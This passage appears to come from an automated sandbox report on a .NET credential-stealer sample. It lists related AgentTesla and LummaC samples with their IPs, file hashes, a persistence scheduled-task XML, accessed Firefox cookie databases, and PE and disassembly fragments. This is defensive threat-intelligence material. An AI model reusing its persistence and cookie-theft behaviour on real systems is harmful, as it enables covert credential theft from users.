                                          smtp.yandex.ruREQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 77.88.21.158
                                          7Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                                          • 77.88.21.158
                                          e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                                          • 77.88.21.158
                                          DHL Delivery Invoice.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                          • 77.88.21.158
                                          DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 77.88.21.158
                                          DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                          • 77.88.21.158
                                          datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                          • 77.88.21.158
                                          datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                          • 77.88.21.158
                                          0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                          • 77.88.21.158
                                          BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                          • 77.88.21.158
                                          s-part-0035.t-0009.t-msedge.net6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                          • 13.107.246.63
                                          Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                          • 13.107.246.63
                                          BUNKER INVOICE MV SUN OCEAN.pdf.vbsGet hashmaliciousGuLoaderBrowse
                                          • 13.107.246.63
                                          Bunker_STS_pdf.vbsGet hashmaliciousGuLoaderBrowse
                                          • 13.107.246.63
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.63
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.63
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.63
                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                          • 13.107.246.63
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.63
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.63

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          YANDEXRUkfqDgByhO2.lnkGet hashmaliciousROKRATBrowse
                                          • 213.180.204.127
                                          https://wdurl.ru/4mA#yml4dckta8ps5szGet hashmaliciousUnknownBrowse
                                          • 87.250.250.119
                                          REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 77.88.21.158
                                          dtkB4s3lqj.lnkGet hashmaliciousUnknownBrowse
                                          • 213.180.204.127
                                          https://sendgb.com/dxukcl49bIj?utm_medium=mvC3BJ1YMhqe8znGet hashmaliciousHTMLPhisherBrowse
                                          • 213.180.204.90
                                          7Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                                          • 77.88.21.158
                                          idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                          • 87.250.251.119
                                          idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                          • 87.250.251.119
                                          e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                                          • 77.88.21.158
                                          https://bielefelde.de/Get hashmaliciousUnknownBrowse
                                          • 77.88.21.119

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NnXVkDOvj.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\NnXVkDOvj.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.380192968514367
                                          Encrypted:false
                                          SSDEEP:48:SWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZmUyus:SLHyIFKL3IZ2KRH9Ouggs
                                          MD5:17E5482F53FBC063887032C16AF327AD
                                          SHA1:A1D6CCB5FB5A4906244B4207D2AA7596ECE4EA33
                                          SHA-256:4FB5B48C861410302A304DD99EA5796D4257B510B6BFCBD8FA414F58158B8532
                                          SHA-512:48D4AEDFB62FE0F0D6F3171944625235DC24C8D5886CC170249AF166D9D023092D6957E9DF9AE96EF1A29427AE7B4F9A4F33DA6EB6AFB6DC9FDC90FA02C0626D
                                          Malicious:false
                                          Preview:@...e.................................K..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kh15jou.qmw.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dx4eoa2u.00i.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hgimwtfr.mcn.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmijhhdc.wfz.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pw4guyla.na0.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruufd53r.hih.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sl5os1tz.kp2.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsbjkvfy.4sw.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1568
                                          Entropy (8bit):5.093185434771643
                                          Encrypted:false
                                          SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTew5v:HeLwYrFdOFzOz6dKrsuqA
                                          MD5:808A004D4386C21EEDEB4252D48322E7
                                          SHA1:0C92A4A8AA8C4102E76AD124BD27E9AD4F53D99E
                                          SHA-256:BD7E4993177AC06FD60ACDB90D3E810688E3C4BBE2E6EB01D36F6790CB5F3D9D
                                          SHA-512:D31A3F09C9A40C72D20474714F449C736341484E4A46041448DA7FB9DF542DB4F6423E5A7EE3CDF6E5D9611125266FA20B21E29264B1EE4643A12E11E8D54CCE
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                          C:\Users\user\AppData\Local\Temp\tmpE3F1.tmp

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\NnXVkDOvj.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1568
                                          Entropy (8bit):5.093185434771643
                                          Encrypted:false
                                          SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTew5v:HeLwYrFdOFzOz6dKrsuqA
                                          MD5:808A004D4386C21EEDEB4252D48322E7
                                          SHA1:0C92A4A8AA8C4102E76AD124BD27E9AD4F53D99E
                                          SHA-256:BD7E4993177AC06FD60ACDB90D3E810688E3C4BBE2E6EB01D36F6790CB5F3D9D
                                          SHA-512:D31A3F09C9A40C72D20474714F449C736341484E4A46041448DA7FB9DF542DB4F6423E5A7EE3CDF6E5D9611125266FA20B21E29264B1EE4643A12E11E8D54CCE
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                          C:\Users\user\AppData\Roaming\NnXVkDOvj.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):738304
                                          Entropy (8bit):7.663650479650768
                                          Encrypted:false
                                          SSDEEP:12288:cbdY9shQg0fFkVXGWt3SeuihVgCLyuD+bvQCzuuSZwMs12Cov0jFW8KOaMG:Cdhlkw1hVgCLkMTwMI2CoMhW
                                          MD5:F76DE5E39251D01E3FAE90CC04705F71
                                          SHA1:8B9961EAD051DB17A56CC67F39760220217C2839
                                          SHA-256:550396BEF4076D1D9819AB7BC40F61B6ECF0AF88FC68869A5AABD0D88F084005
                                          SHA-512:8912DD618A00A9F737D6C486D69ECA776627A9B3E255197021AC43CF5E72F7462C1C4117D41B7F4E11789EF53741AB362C5B595C3506E7DB1DD0C21C884CC2C1
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....]Vg..............0......(.......9... ...@....@.. ....................................@.................................89..O....@...$........................................................................... ............... ..H............text........ ...................... ..`.rsrc....$...@...&..................@..@.reloc...............B..............@..B................l9......H.......$L...{..........(....r...........................................0...........(.....(.....{...........%.r...p( ...s!....%.r...p( ...s!....%.r%..p( ...s!........T...%.b...("...s!...(#...rA..p ............%...%...o$...&*....0..^........{....o%....{.....A.Zo&....[...o'...&.{....o%...o(....>"....{....o%...o)....{....o%...r_..po'...&.{....o*...ru..pr_..p.(+....@.....{....o.....{....r...p.{....|....(,...(-...o.....{....r...p.{....|....(,...(-...o.....{....r...p.{....|....(,.

                                          C:\Users\user\AppData\Roaming\NnXVkDOvj.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          C:\Users\user\AppData\Roaming\btyur2gr.v2b\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                          Category:modified
                                          Size (bytes):98304
                                          Entropy (8bit):0.08235737944063153
                                          Encrypted:false
                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Roaming\mjsqyihp.io3\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\NnXVkDOvj.exe
                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                          Category:modified
                                          Size (bytes):98304
                                          Entropy (8bit):0.08235737944063153
                                          Encrypted:false
                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.663650479650768
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:file.exe
                                          File size:738'304 bytes
                                          MD5:f76de5e39251d01e3fae90cc04705f71
                                          SHA1:8b9961ead051db17a56cc67f39760220217c2839
                                          SHA256:550396bef4076d1d9819ab7bc40f61b6ecf0af88fc68869a5aabd0d88f084005
                                          SHA512:8912dd618a00a9f737d6c486d69eca776627a9b3e255197021ac43cf5e72f7462c1c4117d41b7f4e11789ef53741ab362c5b595c3506e7db1dd0c21c884cc2c1
                                          SSDEEP:12288:cbdY9shQg0fFkVXGWt3SeuihVgCLyuD+bvQCzuuSZwMs12Cov0jFW8KOaMG:Cdhlkw1hVgCLkMTwMI2CoMhW
                                          TLSH:12F4F264B75DC417D89516348EB1E6BC25689E8CF802D213AEECBFEF7D76B191C00292
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....]Vg..............0......(.......9... ...@....@.. ....................................@................................

                                          File Icon

                                          Icon Hash:17692632b3936907

                                          Static PE Info

                                          General

                                          Entrypoint:0x4b398a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x67565D93 [Mon Dec 9 03:01:39 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          push ebx
                                          add byte ptr [ecx+00h], bh
                                          jnc 00007F5FDCEC3582h
                                          je 00007F5FDCEC3582h
                                          add byte ptr [ebp+00h], ch
                                          add byte ptr [ecx+00h], al
                                          arpl word ptr [eax], ax
                                          je 00007F5FDCEC3582h
                                          imul eax, dword ptr [eax], 00610076h
                                          je 00007F5FDCEC3582h
                                          outsd
                                          add byte ptr [edx+00h], dh
                                          push ebx
                                          add byte ptr [ecx+00h], bh
                                          jnc 00007F5FDCEC3582h
                                          je 00007F5FDCEC3582h
                                          add byte ptr [ebp+00h], ch
                                          add byte ptr [edx+00h], dl
                                          add byte ptr [esi+00h], ah
                                          insb
                                          add byte ptr [ebp+00h], ah
                                          arpl word ptr [eax], ax
                                          je 00007F5FDCEC3582h
                                          imul eax, dword ptr [eax], 006E006Fh
                                          add byte ptr [ecx+00h], al
                                          jnc 00007F5FDCEC3582h
                                          jnc 00007F5FDCEC3582h
                                          add byte ptr [ebp+00h], ch
                                          bound eax, dword ptr [eax]
                                          insb
                                          add byte ptr [ecx+00h], bh
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          dec esp
                                          add byte ptr [edi+00h], ch
                                          popad
                                          add byte ptr [eax+eax+00h], ah
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
